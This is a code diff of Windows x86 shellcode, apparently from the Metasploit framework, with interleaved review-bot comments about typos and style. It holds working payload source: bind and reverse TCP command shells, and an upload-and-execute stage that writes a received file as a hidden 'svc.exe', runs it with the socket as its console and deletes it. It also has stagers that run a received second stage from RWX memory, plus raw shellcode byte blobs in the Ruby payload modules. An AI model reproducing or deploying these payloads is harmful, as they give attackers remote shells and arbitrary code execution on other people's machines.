||||
return h
|
||||
#=============================================================================#
|
||||
def scan( dll_path, dll_name, print_hashes=False, print_collisions=True ):
|
||||
global modules_scanned
|
||||
global functions_scanned
|
||||
try:
|
||||
dll_name = dll_name.lower()
|
||||
modules_scanned += 1
|
||||
pe = pefile.PE( os.path.join( dll_path, dll_name ) )
|
||||
for export in pe.DIRECTORY_ENTRY_EXPORT.symbols:
|
||||
if export.name is None:
|
||||
continue
|
||||
h = hash( dll_name, export.name, print_hash=print_hashes )
|
||||
for ( col_hash, col_name ) in collisions:
|
||||
if col_hash == h and col_name != "%s!%s" % (dll_name, export.name):
|
||||
if h not in collisions_detected.keys():
|
||||
collisions_detected[h] = []
|
||||
collisions_detected[h].append( (dll_path, dll_name, export.name) )
|
||||
break
|
||||
functions_scanned += 1
|
||||
except:
|
||||
pass
|
||||
#=============================================================================#
|
||||
def scan_directory( dir ):
|
||||
for dot, dirs, files in os.walk( dir ):
|
||||
for file_name in files:
|
||||
if file_name[-4:] == ".dll":# or file_name[-4:] == ".exe":
|
||||
scan( dot, file_name )
|
||||
print "\n[+] Found %d Collisions.\n" % ( len(collisions_detected) )
|
||||
for h in collisions_detected.keys():
|
||||
for (col_hash, col_name ) in collisions:
|
||||
if h == col_hash:
|
||||
detected_name = col_name
|
||||
break
|
||||
print "[!] Collision detected for 0x%08X (%s):" % ( h, detected_name )
|
||||
for (collided_dll_path, collided_dll_name, collided_export_name) in collisions_detected[h]:
|
||||
print "\t%s!%s (%s)" % ( collided_dll_name, collided_export_name, collided_dll_path )
|
||||
print "\n[+] Scanned %d exported functions via %d modules.\n" % ( functions_scanned, modules_scanned )
|
||||
#=============================================================================#
|
||||
def main( argv=None ):
|
||||
if not argv:
|
||||
argv = sys.argv
|
||||
try:
|
||||
if len( argv ) == 1:
|
||||
print "Usage: hash.py [/dir <path>] | [/mod <path> <module.dll>] | [<module.dll> <function>]"
|
||||
else:
|
||||
print "[+] Ran on %s\n" % ( time.asctime( time.localtime() ) )
|
||||
if argv[1] == "/dir":
|
||||
print "[+] Scanning directory '%s' for collisions..." % argv[2]
|
||||
scan_directory( argv[2] )
|
||||
elif argv[1] == "/mod":
|
||||
print "[+] Scanning module '%s' in directory '%s'..." % ( argv[3], argv[2] )
|
||||
scan( argv[2], argv[3], print_hashes=True )
|
||||
else:
|
||||
hash( argv[1], argv[2] )
|
||||
except Exception, e:
|
||||
print "[-] ", e
|
||||
#=============================================================================#
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
#=============================================================================#
|
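Review bot: In `hash()` the accumulations `module_hash += ord( c )` and `function_hash += ord( c )` are not masked to 32 bits before the next `ror()`, so in the rare case the rotated value is within 255 of 0xFFFFFFFF the carry lands in bit 32 and `ror()` shifts it down into bit 19, while the `add edi, eax` / `ror edi, 13` pair in block_api.asm simply wraps; `module_hash = ( module_hash + ord( c ) ) & 0xFFFFFFFF` (and the same for `function_hash`) keeps the Python model in lockstep with the assembly. `scan()` ends in a bare `except: pass`, which hides not only unparsable files but also typos and modules without an export directory; catching `pefile.PEFormatError` (and `AttributeError` for a missing `DIRECTORY_ENTRY_EXPORT`) and printing the skipped path would keep the scan going while telling the user what was not checked. `hash` and `unicode` shadow Python 2 builtins of the same names; renaming them (e.g. `api_hash`, `to_utf16`) avoids confusion in a file that also calls `str()`.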
|
@ -0,0 +1,26 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (28 July 2009)
|
||||
; Size: 191 bytes + strlen(command) + 1
|
||||
; Build: >build.py single_exec
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
delta: ;
|
||||
%include "./src/block/block_api.asm" ;
|
||||
start: ;
|
||||
pop ebp ; Pop off the address of 'api_call' for calling later.
|
||||
push byte +1 ;
|
||||
lea eax, [ebp+command-delta]
|
||||
push eax ;
|
||||
push 0x876F8B31 ; hash( "kernel32.dll", "WinExec" )
|
||||
call ebp ; WinExec( &command, 1 );
|
||||
; Finish up with the EXITFUNK.
|
||||
%include "./src/block/block_exitfunk.asm"
|
||||
command:
|
||||
;db "calc.exe", 0
|
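Review bot: `push byte +1` and the following `push eax` are the two WinExec arguments but carry empty comments, unlike the rest of the file; `push byte +1 ; uCmdShow = SW_SHOWNORMAL` and `push eax ; lpCmdLine = &command` would match the style of the surrounding lines. The `command:` label is followed only by the commented-out `;db "calc.exe", 0`, so the assembled blob ends with an empty label; given the header's "Size: 191 bytes + strlen(command) + 1" the string is presumably appended to the binary by the framework, and a comment at the label saying so would make the empty definition look intentional rather than like a leftover.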
|
@ -0,0 +1,20 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (28 July 2009)
|
||||
; Size: 341 bytes
|
||||
; Build: >build.py single_shell_bind_tcp
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; Pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_bind_tcp.asm"
|
||||
; By here we will have performed the bind_tcp connection and EDI will be out socket.
|
||||
%include "./src/block/block_shell.asm"
|
||||
; Finish up with the EXITFUNK.
|
||||
%include "./src/block/block_exitfunk.asm"
|
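Review bot: The comment "By here we will have performed the bind_tcp connection and EDI will be out socket." has a typo, "out" for "our"; the same line in single_shell_reverse_tcp.asm ("EDI will be out socket") needs the same fix. Both singles, like single_exec.asm, include their blocks via `./src/block/...` paths, so they only assemble from the directory that contains `src/`, which matches build.py's own `./src/` and `./bin/` defaults; a short header note to that effect would help anyone invoking nasm directly.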
20
external/source/shellcode/windows/x86/src/single/single_shell_reverse_tcp.asm
|
@ -0,0 +1,20 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (28 July 2009)
|
||||
; Size: 314 bytes
|
||||
; Build: >build.py single_shell_reverse_tcp
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; Pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_reverse_tcp.asm"
|
||||
; By here we will have performed the reverse_tcp connection and EDI will be out socket.
|
||||
%include "./src/block/block_shell.asm"
|
||||
; Finish up with the EXITFUNK.
|
||||
%include "./src/block/block_exitfunk.asm"
|
|
@ -0,0 +1,22 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (28 July 2009)
|
||||
; Size: 240 bytes
|
||||
; Build: >build.py stage_shell
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
; By here EDI will be our socket and EBP will be the address of 'api_call' from stage 1.
|
||||
; We reset EBP to the address of 'api_call' as found in this blob to avoid any problems
|
||||
; if the old stage 1 location gets munged.
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; Pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_shell.asm"
|
||||
; Perform the call to our EXITFUNC.
|
||||
%include "./src/block/block_exitfunk.asm"
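Review bot: The closing comment `; Perform the call to our EXITFUNC.` describes the same block_exitfunk.asm include that every other file in this commit introduces as `; Finish up with the EXITFUNK.`; one wording across the set makes grepping for the exit path easier. The preamble explains why EBP is re-derived but not where the socket-in-EDI assumption comes from; the stager modules declare it as `'Convention' => 'sockedi'`, so `; Expects the 'sockedi' stager convention: EDI holds the connected socket on entry.` would make the dependency explicit. stage_upexec.asm opens with the identical preamble and would take the same line.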
|
|
@ -0,0 +1,137 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (28 July 2009)
|
||||
; Size: 398 bytes
|
||||
; Build: >build.py stage_upexec
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
; By here EDI will be our socket and EBP will be the address of 'api_call' from stage 1.
|
||||
; We reset EBP to the address of 'api_call' as found in this blob to avoid any problems
|
||||
; if the old stage 1 location gets munged.
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
delta: ;
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; Pop off the address of 'api_call' for calling later.
|
||||
; create a file in a temp dir...
|
||||
push byte 127 ; Push down 127
|
||||
pop eax ; And pop it into EAX
|
||||
shl eax, 3 ; Shift EAX left by 3 so it = 1016
|
||||
sub esp, eax ; Alloc this space on the stack for the temp file path + name
|
||||
push esp ; Push the buffer address
|
||||
push eax ; Push the buffer size (127 * 4 = 508)
|
||||
push 0xE449F330 ; hash( "kernel32.dll", "GetTempPathA" )
|
||||
call ebp ; GetTempPathA( 1016, &buffer );
|
||||
lea eax, [esp+eax] ; EAX = pointer to the end of the temp path buffer (ESP point to the full path)
|
||||
mov dword [eax+0], 0x2E637673 ; Append the file name...
|
||||
mov dword [eax+4], 0x00657865 ; 'svc.exe',0
|
||||
; Create the file...
|
||||
mov eax, esp ; to save a few bytes, pace the file path pointer in EAX
|
||||
push eax ; save the pointer to the file path for later
|
||||
push byte 0 ; We dont specify a template file handle
|
||||
push byte 6 ; The Flags and Attributes: FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM
|
||||
push byte 2 ; The Creation Disposition: CREATE_ALWAYS
|
||||
push byte 0 ; We dont specify a SECURITY_ATTRIBUTES structure
|
||||
push byte 7 ; The Share Mode: FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE
|
||||
push 0xE0000000 ; The Desired Access: GENERIC_EXECUTE|GENERIC_READ|GENERIC_WRITE
|
||||
push eax ; The name of the file to create
|
||||
push 0x4FDAF6DA ; hash( "kernel32.dll", "CreateFileA" )
|
||||
call ebp ; CreateFileA( ... );
|
||||
mov ebx, eax ; EBX = the new file handle
|
||||
; Receive the size of the incoming file...
|
||||
push esp ; Alloc a dword for the recv buffer param
|
||||
mov esi, esp ; Save pointer
|
||||
push byte 0 ; Flags
|
||||
push byte 4 ; Length = sizeof( DWORD );
|
||||
push esi ; The 4 byte buffer on the stack to hold the second stage length
|
||||
push edi ; The saved socket
|
||||
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
|
||||
call ebp ; recv( s, &dwLength, 4, 0 );
|
||||
; Alloc a RW buffer for the incoming file...
|
||||
mov esi, [esi] ; Dereference the pointer to the second stage length
|
||||
push byte 0x04 ; PAGE_READWRITE
|
||||
push 0x1000 ; MEM_COMMIT
|
||||
push esi ; Push the newly recieved second stage length.
|
||||
push byte 0 ; NULL as we dont care where the allocation is.
|
||||
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
|
||||
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_READWRITE );
|
||||
push ebx ; Save the file handle for later call to CloseHandle
|
||||
; setup the parameters for subsequent call to WriteFile (saves us trying to preserve various registers)
|
||||
push ebx ; Alloc a dword for the bytes written param
|
||||
mov ecx, esp ; Save this address
|
||||
push byte 0 ; null as we dont set an overlapped param
|
||||
push ecx ; Pointer to the number of bytes written output param
|
||||
push esi ; Push the buffer length
|
||||
push eax ; Push the newly allocated RW buffer
|
||||
push ebx ; Push the hFile param
|
||||
mov ebx, eax ; EBX = our new memory address for the incoming file
|
||||
; read in the incoming file...
|
||||
read_more: ;
|
||||
push byte 0 ; Flags
|
||||
push esi ; Length
|
||||
push ebx ; The current address into our incoming files RW buffer
|
||||
push edi ; The saved socket
|
||||
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
|
||||
call ebp ; recv( s, buffer, length, 0 );
|
||||
add ebx, eax ; buffer += bytes_received
|
||||
sub esi, eax ; length -= bytes_received
|
||||
test esi, esi ; Test length
|
||||
jnz read_more ; Continue if we have more to read
|
||||
; write the entire files buffer to disk...
|
||||
push 0x5BAE572D ; hash( "kernel32.dll", "WriteFile" )
|
||||
call ebp ; WriteFile( hFile, pBuffer, len, &out, 0 );
|
||||
pop ecx ; Restore esp to the correct location for the next call
|
||||
; close the file handle, we dont need to push the handle as it is allready pushed onto stack
|
||||
push 0x528796C6 ; hash( "kernel32.dll", "CloseHandle" )
|
||||
call ebp ; CloseHandle( hFile );
|
||||
; execute the file...
|
||||
push edi ; Our socket becomes the processes hStdError
|
||||
push edi ; Our socket becomes the processes hStdOutput
|
||||
push edi ; Our socket becomes the processes hStdInput
|
||||
xor esi, esi ; Clear ESI for all the NULL's we need to push
|
||||
push byte 18 ; We want to place (18 * 4) = 72 null bytes onto the stack
|
||||
pop ecx ; Set ECX for the loop
|
||||
push_loop2: ;
|
||||
push esi ; Push a null dword
|
||||
loop push_loop2 ; Keep looping untill we have pushed enough nulls
|
||||
mov word [esp+60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
|
||||
lea eax, [esp+16] ; Set EAX as a pointer to our STARTUPINFO Structure
|
||||
mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure
|
||||
; perform the call to CreateProcessA
|
||||
push esp ; Push the pointer to the PROCESS_INFORMATION Structure
|
||||
push eax ; Push the pointer to the STARTUPINFO Structure
|
||||
push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
|
||||
push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
|
||||
push esi ; We dont specify any dwCreationFlags
|
||||
inc esi ; Increment ESI to be one
|
||||
push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
|
||||
dec esi ; Decrement ESI back down to zero
|
||||
push esi ; Set lpThreadAttributes to NULL
|
||||
push esi ; Set lpProcessAttributes to NULL
|
||||
push dword [esp+120] ; Set the lpCommandLine to run the file (Use the saved pointer to the file path)
|
||||
push esi ; Set lpApplicationName to NULL as we are using the command line param instead
|
||||
push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" )
|
||||
call ebp ; CreateProcessA( 0, &file, 0, 0, TRUE, 0, 0, 0, &si, &pi );
|
||||
; perform the call to WaitForSingleObject
|
||||
mov eax, esp ; Save pointer to the PROCESS_INFORMATION Structure
|
||||
dec esi ; Decrement ESI down to -1 (INFINITE)
|
||||
push esi ; Push INFINITE inorder to wait forever
|
||||
inc esi ; Increment ESI back to zero
|
||||
push dword [eax] ; Push the handle from our PROCESS_INFORMATION.hProcess
|
||||
push 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" )
|
||||
call ebp ; WaitForSingleObject( pi.hProcess, INFINITE );
|
||||
; close the socket...
|
||||
push edi ; Push the socket to close
|
||||
push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
|
||||
call ebp ; closesocket( s );
|
||||
; delete the file...
|
||||
push dword [esp+88] ; Push the saved pointer to the file path
|
||||
push 0x13DD2ED7 ; hash( "kernel32.dll", "DeleteFileA" )
|
||||
call ebp ; DeleteFileA( &file );
|
||||
; finish up with the EXITFUNK
|
||||
%include "./src/block/block_exitfunk.asm"
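Review bot: The buffer-size comments contradict each other: `shl eax, 3` is documented as making EAX 1016, but the following `push eax` is annotated `(127 * 4 = 508)`; since 127 << 3 is 1016 (which the `GetTempPathA( 1016, &buffer )` annotation also uses), the push comment should read `; Push the buffer size (127 * 8 = 1016)`. The two bare stack offsets `push dword [esp+120]` and `push dword [esp+88]` both reach the file-path pointer saved by the `push eax` just after `mov eax, esp`, and a comment saying so (and that any push added in between shifts them) would save the next reader from re-deriving the stack layout. While here, `pace` → `place`, `recieved` → `received`, `allready` → `already` and `untill` → `until` in the same hunk.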
|
|
@ -0,0 +1,19 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
; Size: 301 bytes
|
||||
; Build: >build.py stager_bind_tcp_nx
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_bind_tcp.asm"
|
||||
; By here we will have performed the bind_tcp connection and EDI will be our socket.
|
||||
%include "./src/block/block_recv.asm"
|
||||
; By now we will have recieved in the second stage into a RWX buffer and be executing it
|
|
@ -0,0 +1,20 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
; Size: 274 bytes
|
||||
; Build: >build.py stager_reverse_tcp_nx
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_reverse_tcp.asm"
|
||||
; By here we will have performed the reverse_tcp connection and EDI will be our socket.
|
||||
%include "./src/block/block_recv.asm"
|
||||
; By now we will have recieved in the second stage into a RWX buffer and be executing it
|
|
@ -15,9 +15,9 @@ module Msf::Payload::Windows
|
|||
#
|
||||
@@exit_types =
|
||||
{
|
||||
'seh' => 0x5f048af0, # SetUnhandledExceptionFilter
|
||||
'thread' => 0x60e0ceef, # ExitThread
|
||||
'process' => 0x73e2d87e, # ExitProcess
|
||||
'seh' => 0xEA320EFE, # SetUnhandledExceptionFilter
|
||||
'thread' => 0x0A2A1DE0, # ExitThread
|
||||
'process' => 0x56A2B5F0, # ExitProcess
|
||||
}
|
||||
|
||||
#
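Review bot: The three replacement hashes are swapped in with no note of how they are derived, so the next person who touches the api_call block cannot tell whether this table has to be regenerated. A comment above the hash, e.g. `# Function hashes as computed by the api_call block in src/block/block_api.asm; regenerate with build.py whenever that block changes`, would cover it. It is also worth recording here that two payloads in this same commit override replace_var to keep writing the pre-change values (0x5F048AF0, 0x60E0CEEF, 0x73E2D87E), so the old table has not really gone away and the two sets need to be kept in step.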
|
||||
|
@ -64,6 +64,13 @@ module Msf::Payload::Windows
|
|||
# ensure that the entire stage is read in.
|
||||
#
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
|
||||
if( self.module_info['Stager']['RequiresMidstager'] == false )
|
||||
conn.put( [ payload.length ].pack('V') )
|
||||
# returning false allows stager.rb!handle_connection() to prepend the stage_prefix if needed
|
||||
return false
|
||||
end
|
||||
|
||||
return false if (payload.length < 512)
|
||||
|
||||
# The mid-stage works by reading in a four byte length in host-byte
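Review bot: `self.module_info['Stager']['RequiresMidstager']` raises NoMethodError on nil if anything reaches handle_intermediate_stage without a 'Stager' hash; I cannot tell from this hunk whether that can happen, but a nil-safe lookup costs nothing: `stager_info = self.module_info['Stager'] || {}` followed by `if( stager_info['RequiresMidstager'] == false )`. The explicit `== false` looks deliberate (an absent key still means the midstager is required) and deserves a one-line comment saying so, otherwise it will get "simplified" to `unless`. handle_intermediate_stage continues past the end of the hunk.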
|
||||
|
|
|
@ -1,3 +1,7 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
|
@ -5,6 +9,7 @@ module Msf
|
|||
# Common command execution implementation for Windows.
|
||||
#
|
||||
###
|
||||
|
||||
module Payload::Windows::Exec
|
||||
|
||||
include Msf::Payload::Windows
|
||||
|
@ -15,7 +20,7 @@ module Payload::Windows::Exec
|
|||
'Name' => 'Windows Execute Command',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Execute an arbitrary command',
|
||||
'Author' => 'vlad902',
|
||||
'Author' => [ 'vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
|
@ -23,16 +28,20 @@ module Payload::Windows::Exec
|
|||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'EXITFUNC' => [ 100, 'V' ]
|
||||
'EXITFUNC' => [ 161, 'V' ]
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" +
|
||||
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" +
|
||||
"\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04" +
|
||||
"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" +
|
||||
"\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64" +
|
||||
"\x8b\x46\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83" +
|
||||
"\xc0\x6a\x50\x68\x7e\xd8\xe2\x73\x68\x98\xfe\x8a\x0e\x57\xff\xe7"
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x6A\x01\x8D\x85\xB9\x00\x00\x00\x50\x68\x31\x8B\x6F\x87\xFF\xD5" +
|
||||
"\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A" +
|
||||
"\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
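Review bot: The new 'Payload' blob and the EXITFUNC offset 161 are build artifacts with no pointer back to their source, so a future change to the assembly cannot be reproduced from this file. A comment above 'Offsets', e.g. `# Generated with 'build.py single_exec' from external/source/shellcode/windows/x86/src/single/single_exec.asm; the offsets come from the build output`, would fix that (the exact path is presumed from the other asm files in this commit). The same applies to the shell_bind_tcp, shell_reverse_tcp, bind_tcp stager and reverse_tcp stager sections further down, which all replace their blobs without a source reference.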
|
||||
|
||||
|
|
|
@ -82,7 +82,7 @@ module Payload::Windows::ReflectiveDllInject
|
|||
"\x68\x04\x00\x00\x00" + # push 0x4 ; signal we have attached
|
||||
"\x50" + # push eax ; some value for hinstance
|
||||
"\xFF\xD0" + # call eax ; call DllMain( somevalue, DLL_METASPLOIT_ATTACH, socket )
|
||||
"\x68\xDE\xC0\xAD\xDE" + # push 0xDEADC0DE ; our EXITFUNC placeholder
|
||||
"\x68\xE0\x1D\x2A\x0A" + # push 0x0A2A1DE0 ; our EXITFUNC placeholder (Default to ExitThread for migration)
|
||||
"\x68\x05\x00\x00\x00" + # push 0x5 ; signal we have detached
|
||||
"\x50" + # push eax ; some value for hinstance
|
||||
"\xFF\xD3" # call ebx ; call DllMain( somevalue, DLL_METASPLOIT_DETACH, exitfunk )
|
||||
|
|
|
@ -24,7 +24,7 @@ module Metasploit3
|
|||
'Name' => 'Windows Command Shell, Bind TCP Inline',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Listen for a connection and spawn a command shell',
|
||||
'Author' => 'vlad902',
|
||||
'Author' => [ 'vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
|
@ -34,38 +34,31 @@ module Metasploit3
|
|||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 162, 'n' ],
|
||||
'EXITFUNC' => [ 308, 'V' ],
|
||||
'LPORT' => [ 201, 'n' ],
|
||||
'EXITFUNC' => [ 311, 'V' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c" +
|
||||
"\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" +
|
||||
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
|
||||
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" +
|
||||
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f" +
|
||||
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" +
|
||||
"\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" +
|
||||
"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" +
|
||||
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53" +
|
||||
"\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" +
|
||||
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66" +
|
||||
"\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" +
|
||||
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53" +
|
||||
"\x43\x53\xff\xd0\x66\x68\x11\x5c\x66\x53\x89\xe1" +
|
||||
"\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51" +
|
||||
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" +
|
||||
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50" +
|
||||
"\x54\x54\x55\xff\xd0\x93\x68\xe7\x79\xc6\x79\x57" +
|
||||
"\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d" +
|
||||
"\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" +
|
||||
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93" +
|
||||
"\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff" +
|
||||
"\x75\x44\xff\xd6\x5b\x57\x52\x51\x51\x51\x6a\x01" +
|
||||
"\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" +
|
||||
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83" +
|
||||
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\x7e\xd8\xe2\x73" +
|
||||
"\x53\xff\xd6\xff\xd0"
|
||||
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
